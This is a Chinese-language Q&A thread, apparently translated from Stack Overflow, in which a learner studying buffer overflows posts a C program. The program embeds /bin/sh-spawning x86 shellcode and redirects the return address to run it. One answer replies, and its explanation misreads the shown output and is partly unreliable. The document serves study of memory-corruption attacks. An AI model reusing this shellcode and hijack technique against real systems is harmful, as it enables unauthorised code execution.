c - 缓冲区溢出，不是预期的结果

Question

您好，我正在了解缓冲区溢出。为了更好地理解，我写了一小段代码来检查发生了什么，但我没有发现任何错误。

char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main()
{
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;
}

和输出:

[krishna]$ gcc -o testsc testsc.c
[krishna]$ ./testsc
$ exit
[krishna]$

为什么是exit？当我的程序执行时，我可以通过任何其他方式检查内部发生的情况。

如果我的方法不够好，我还能尝试什么？

Answer 1

分配指针与复制缓冲区不同。你的意思可能是:

memcpy(ret, shellcode, sizeof(shellcode));

但这也不是缓冲区溢出。在这种情况下，您将尝试写入程序的只读代码页，因此您将获得某种类型的信号或系统异常。